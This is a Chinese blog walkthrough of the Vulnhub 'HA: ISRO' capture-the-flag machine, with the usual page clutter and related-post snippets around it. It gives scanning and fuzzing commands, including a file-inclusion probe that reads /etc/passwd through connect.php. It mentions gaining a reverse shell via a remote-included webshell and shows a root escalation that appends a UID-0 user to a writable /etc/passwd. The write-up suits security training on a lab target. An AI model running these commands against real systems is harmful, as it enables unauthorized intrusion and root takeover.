Vulnhub: HA: ISRO靶机

已于 2023-06-07 23:19:19 修改
阅读量62 收藏
点赞数
文章标签: 安全 网络安全 web安全
于 2023-06-03 14:40:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/131021116
版权

kali:192.168.111.111

靶机:192.168.111.134

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.134

目录爆破,发现存在connect.php

feroxbuster -k -d 1 --url http://192.168.111.134 -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap -t 1 -e -C 404

漏洞利用

对该页面测试后发现该页面存在文件包含

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 0 http://192.168.111.134/connect.php?FUZZ=../../../../../../../../../../../../../../etc/passwd

同时可以远程文件包含一句话木马执行命令

获得反弹shell

提权

/etc/passwd可写

写入用户提权

openssl passwd -1 -salt a a
echo 'a:$1$a$44cUw6Nm5bX0muHWNIwub0:0:0::/root:/bin/bash' >> /etc/passwd

flag

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之加密解密(HAISRO)
afei001
10-31 495
练习环境 攻击机:kali 靶机HAISRO 下载地址:https : //download.vulnhub.com/ha/isro.zip 1.发现靶机,端口扫描 root@afei:~# netdiscover -r 192.168.100.135 Currently scanning: 192.168.100.0/24 | Screen View: Unique Hosts ...
Bulldog靶机-walkthrough
ins1ght的博客
09-05 1436
Bulldog靶机,一个CTF类型的靶机
ha:isro靶机 writeup(并不完整)
id_null的博客
11-02 736
靶机地址:https://www.vulnhub.com/entry/ha-isro,376/ 根据作者的提示,一共四个flag,主要测试枚举的能力,后面我才发现是枚举说的是社工。。。 Aryabhata Bhaskara Mangalyaan Chandrayaan 2 0x01 遇事不决nmap nmap扫描结果: 192.168.109.129 22 ssh 80 htt...
VulnHub系列』HA: ISRO-Walkthrough
ins1ght的博客
10-23 911
靶机发布日期:2019年10月4日,这是一个CTF类型的靶机,共有4个flag。查看网页源代码得到提示,下载到一个TrueCrypt类型的文件,使用脚本以及john得到密码,最过VeraCrypt打开文件,得到flag;gobuster发现connect.php页面,随后通过该页面反弹shell,进入靶机后发现/etc/passwd可写,成功提权。
Vulnhub靶机hacksudo-FOG
qq_48904485的博客
02-08 879
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机hacksudo-FOG(10.0.2.48)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hacksudo-fog,697/
靶机渗透练习99-hacksudo:FOG
hirak0的博客
05-12 4481
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-fog,697/ Description This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/7ujQrt393b) The box was created with Virtualbox. Upon booting up use netdiscov
ISRO.rar_isro
09-24
标题中的"ISRO.rar_isro"表明这是一份与印度空间研究组织(ISRO)相关的压缩文件,可能包含了关于该组织近期项目的详细信息。描述提到“About recent ISRO Projects”,暗示我们将深入探讨ISRO近期的一些重点任务和...
isroece_isro_ECE_zip_
10-04
ISRO preparation papers
Webapp_ISRO
03-22
Webapp_ISRO】是一个基于Python技术构建的网络应用程序,主要关注于利用Python在Web开发领域的应用。Python作为一门强大的编程语言,因其简洁易读的语法和丰富的库支持,成为了开发Web应用程序的首选之一。本项目...
ISRO-redisgn
05-09
标题“ISRO-redisgn”指的是印度空间研究组织(ISRO)的品牌重塑或网站重新设计项目。这个项目可能涉及到了ISRO在线形象的更新,旨在提供更好的用户体验和更现代的视觉效果。它采用了一系列Web技术,包括HTML、CSS和...
ISRO_AstroSat_9th_InterIIT_Tech_Meet:Inter IIT Tech满足2021年AstroSat准备声明
04-30
AstroSat是印度空间研究组织(ISRO)发射的一颗多波段天体物理学观测卫星,旨在研究宇宙中的多种天文现象。这颗卫星承载了多个科学仪器,包括紫外线、X射线和伽马射线望远镜,使得科学家能够同时在不同光谱段观测天体...
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 682
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 334
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
网络设备安全
最新发布
weixin_48579910的博客
07-11 629
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 976
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
用XDR的思路保护API安全
AKAMAI_CHINA的博客
07-08 939
云计算飞速发展的今天,越来越多应用程序已经转为选择云原生架构,这就少不了Serverless、微服务、API等技术的协助。但同时也有越来越多的企业认识到,一定程度的“API安全”在整体安全与合规态势中发挥着至关重要的作用。然而,对很多企业来说,可能并不太明确API安全技术投资在其更广泛安全栈中的位置。
[图解]SysML和EA建模住宅安全系统-11-接口块
rolt的专栏
07-06 1013
当然内部块图里面肯定要比这个丰富
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 398
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值